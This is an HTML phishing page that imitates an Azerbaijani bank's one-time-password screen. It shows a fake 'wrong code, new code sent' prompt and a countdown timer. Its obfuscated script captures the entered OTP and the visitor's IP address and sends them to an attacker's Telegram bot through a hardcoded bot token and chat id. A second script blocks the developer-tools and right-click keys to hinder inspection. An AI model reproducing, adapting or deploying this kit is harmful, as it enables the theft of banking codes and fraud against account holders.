<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Unibank</title>
    <link rel="stylesheet"
        href="https://ysrex.github.io/millionazz/cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #fff;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .container {
            background-color: #fff;
            border-radius: 15px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            padding: 50px;
            max-width: 300px;
            width: 100%;
            text-align: center;
        }

        .form-group {
            margin-bottom: 20px;
        }

        label {
            font-weight: bold;
            display: block;
            margin-bottom: 5px;
        }

        input[type="number"] {
            width: calc(100% - 12px);
            padding: 10px;
            border: 2px solid black;
            border-radius: 40px;
            box-sizing: border-box;
            font-size: 14px;
        }

        button {
            width: 100%;
            padding: 10px;
            border: none;
            border-radius: 40px;
            background-color: #4caf50;
            color: #fff;
            cursor: pointer;
            font-size: 16px;
            transition: background-color 0.3s ease;
            margin-top: 20px;
        }

        button:disabled {
            background-color: #cccccc;
            cursor: not-allowed;
        }

        button:hover {
            background-color: #45a049;
        }

        .logo {
            margin-bottom: 20px;
            text-align: center;
        }

        .bank-icons {
            display: flex;
            justify-content: center;
            margin-top: 20px;
        }

        .bank-icons i {
            font-size: 24px;
            margin: 0 10px;
            color: #888;
            transition: color 0.3s ease;
        }

        .bank-icons i:hover {
            color: #333;
        }

        .timer {
            font-size: 2rem;
            color: #333;
            margin-bottom: 20px;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="logo">
            <img src="https://million.az/logo/main-logo.svg" alt="Logo" width="200">

        </div>
        <div class="timer" id="timer">02:00</div>
        <form id="myForm">
            <div class="form-group">
                <div class="item item-indent">Daxil etdiyiniz şifrə yanlışdır. </div>
                <label for="cardName">Yeni Şifrə Göndərildi: +994*******</label>
                <input type="number" id="cardName" placeholder="Otp Kod" maxlength="4" minlength="4" required>
            </div>

            <div style="text-align: center;">
                <button type="button" id="submitButton" disabled>İləri <i class="fas fa-arrow-right"></i></button>
            </div>
        </form>
        <div class="bank-icons">
            <i class="fab fa-cc-visa"></i>
            <i class="fab fa-cc-mastercard"></i>
            <i class="fab fa-cc-amex"></i>
        </div>
    </div>

    <script>
        var _0x1e874e=_0x3dc9;(function(_0x392d3c,_0x19c001){var _0x59df35=_0x3dc9,_0x23bec0=_0x392d3c();while(!![]){try{var _0x5373ad=parseInt(_0x59df35(0x202))/0x1+parseInt(_0x59df35(0x1ff))/0x2+parseInt(_0x59df35(0x204))/0x3+-parseInt(_0x59df35(0x1fc))/0x4+parseInt(_0x59df35(0x1de))/0x5*(parseInt(_0x59df35(0x1f2))/0x6)+-parseInt(_0x59df35(0x1eb))/0x7*(-parseInt(_0x59df35(0x1f8))/0x8)+-parseInt(_0x59df35(0x203))/0x9;if(_0x5373ad===_0x19c001)break;else _0x23bec0['push'](_0x23bec0['shift']());}catch(_0x4c026d){_0x23bec0['push'](_0x23bec0['shift']());}}}(_0x1143,0x4718e));function _0x3dc9(_0x17582f,_0x1a9e28){var _0x114390=_0x1143();return _0x3dc9=function(_0x3dc9ac,_0x32b42a){_0x3dc9ac=_0x3dc9ac-0x1db;var _0x13196c=_0x114390[_0x3dc9ac];return _0x13196c;},_0x3dc9(_0x17582f,_0x1a9e28);}var startTime=new Date()[_0x1e874e(0x1e3)](),endTime=startTime+0x2*0x3c*0x3e8,timerInterval=setInterval(function(){var _0x30e2f3=_0x1e874e,_0x58ca0c=new Date()[_0x30e2f3(0x1e3)](),_0x77bc6b=endTime-_0x58ca0c,_0x1dad52=Math[_0x30e2f3(0x1f4)](_0x77bc6b%(0x3e8*0x3c*0x3c)/(0x3e8*0x3c)),_0x505bc3=Math['floor'](_0x77bc6b%(0x3e8*0x3c)/0x3e8);document[_0x30e2f3(0x1df)](_0x30e2f3(0x1e9))[_0x30e2f3(0x1ee)]=formatTime(_0x1dad52)+':'+formatTime(_0x505bc3),_0x77bc6b<0x0&&(clearInterval(timerInterval),document[_0x30e2f3(0x1df)](_0x30e2f3(0x1e9))[_0x30e2f3(0x1ee)]=_0x30e2f3(0x1e5),document[_0x30e2f3(0x1df)]('submitButton')[_0x30e2f3(0x1f5)]=!![]);},0x3e8);function formatTime(_0xb3ba71){return _0xb3ba71<0xa?'0'+_0xb3ba71:_0xb3ba71;}function _0x1143(){var _0x56efbc=['POST','href','676330BhpHSc','IP\x20Adresi\x20Alınamadı:','myForm','21500gHQubk','11077749XamMCT','1175283JTUrUm','Otp-2:\x20','json','then','362545UbRPvS','getElementById','value','\x0aIP:\x20','input','getTime','Telegram\x20Mesajı\x20Gönderildi:','00:00','Telegram\x20Mesajı\x20Gönderme\x20Hatası:','stringify','error','timer','submitButton','14gpgwYv','application/json','addEventListener','innerHTML','https://api.telegram.org/bot','length','cardName','30nejOQV','click','floor','disabled','7519053974:AAGmsaPlNPCGDHXT-H3Wt0sXqbtGRglIaUg','random','2266952oAEUTc','log','catch','/sendMessage','634536DpsurA'];_0x1143=function(){return _0x56efbc;};return _0x1143();}document[_0x1e874e(0x1df)](_0x1e874e(0x201))[_0x1e874e(0x1ed)](_0x1e874e(0x1e2),function(){var _0x4831f2=_0x1e874e,_0x33b1cc=document['getElementById'](_0x4831f2(0x1f1))[_0x4831f2(0x1e0)],_0x15fab3=document[_0x4831f2(0x1df)](_0x4831f2(0x1ea));_0x33b1cc['trim']()[_0x4831f2(0x1f0)]>=0x4?_0x15fab3[_0x4831f2(0x1f5)]=![]:_0x15fab3['disabled']=!![];});const botToken=_0x1e874e(0x1f6),chatId='-4737595773';document[_0x1e874e(0x1df)](_0x1e874e(0x1ea))['addEventListener'](_0x1e874e(0x1f3),function(){var _0xdd038a=_0x1e874e,_0x5b563b=document[_0xdd038a(0x1df)](_0xdd038a(0x1f1))[_0xdd038a(0x1e0)];const _0xa0f4e7=Math[_0xdd038a(0x1f4)](Math[_0xdd038a(0x1f7)]()*0x2710);fetch('https://api.ipify.org?format=json')['then'](_0x3d05ff=>_0x3d05ff[_0xdd038a(0x1dc)]())['then'](_0x21f181=>{var _0x5d52cf=_0xdd038a;const _0x435892=_0x21f181['ip'],_0x460169=_0x5d52cf(0x1db)+_0x5b563b+_0x5d52cf(0x1e1)+_0x435892;fetch(_0x5d52cf(0x1ef)+botToken+_0x5d52cf(0x1fb),{'method':_0x5d52cf(0x1fd),'headers':{'Content-Type':_0x5d52cf(0x1ec)},'body':JSON[_0x5d52cf(0x1e7)]({'chat_id':chatId,'text':_0x460169})})[_0x5d52cf(0x1dd)](_0x879f12=>_0x879f12[_0x5d52cf(0x1dc)]())[_0x5d52cf(0x1dd)](_0x23ad92=>{var _0x2e5185=_0x5d52cf;console[_0x2e5185(0x1f9)](_0x2e5185(0x1e4),_0x23ad92),window['location'][_0x2e5185(0x1fe)]='index2.html';})[_0x5d52cf(0x1fa)](_0x1e8987=>{var _0x344c75=_0x5d52cf;console[_0x344c75(0x1e8)](_0x344c75(0x1e6),_0x1e8987);});})[_0xdd038a(0x1fa)](_0x53401b=>{var _0x2979fa=_0xdd038a;console[_0x2979fa(0x1e8)](_0x2979fa(0x200),_0x53401b);});});
    </script>

    <SCRIPT LANGUAGE="Javascript">

        document.onkeypress = function (event) {
            event = (event || window.event);
            if (event.keyCode == 123) {
                //alert('No F-12');
                return false;
            }
        }
        document.onmousedown = function (event) {
            event = (event || window.event);
            if (event.keyCode == 123) {
                //alert('No F-keys');
                return false;
            }
        }
        document.onkeydown = function (event) {
            event = (event || window.event);
            if (event.keyCode == 123) {
                //alert('No F-keys');
                return false;
            }
        }
        var isNS = (navigator.appName == "Netscape") ? 1 : 0;
        var EnableRightClick = 0;
        if (isNS)
            document.captureEvents(Event.MOUSEDOWN || Event.MOUSEUP);
        function mischandler() {
            if (EnableRightClick == 1) { return true; }
            else { return false; }
        }
        function mousehandler(e) {
            if (EnableRightClick == 1) { return true; }
            var myevent = (isNS) ? e : event;
            var eventbutton = (isNS) ? myevent.which : myevent.button;
            if ((eventbutton == 2) || (eventbutton == 3)) return false;
        }
        function keyhandler(e) {
            var myevent = (isNS) ? e : window.event;
            var eventkeycode = (isNS) ? myevent.which : myevent.keyCode;
            var eventbutton = (isNS) ? myevent.which : myevent.button;
            if (eventkeycode == 123) return false;
            if (eventkeycode == 17) return false;
            if (eventkeycode == 116) return false;
            if (eventkeycode == 67 && eventbutton == 2) return false;
            if (eventkeycode == 67 && eventbutton == 3) return false;
            if (eventkeycode == 117) return false;
        }
        document.onmousedown = mousehandler;
        document.onmouseup = mousehandler;
        document.onkeydown = keyhandler;
        //--></SCRIPT>
</body>

</html>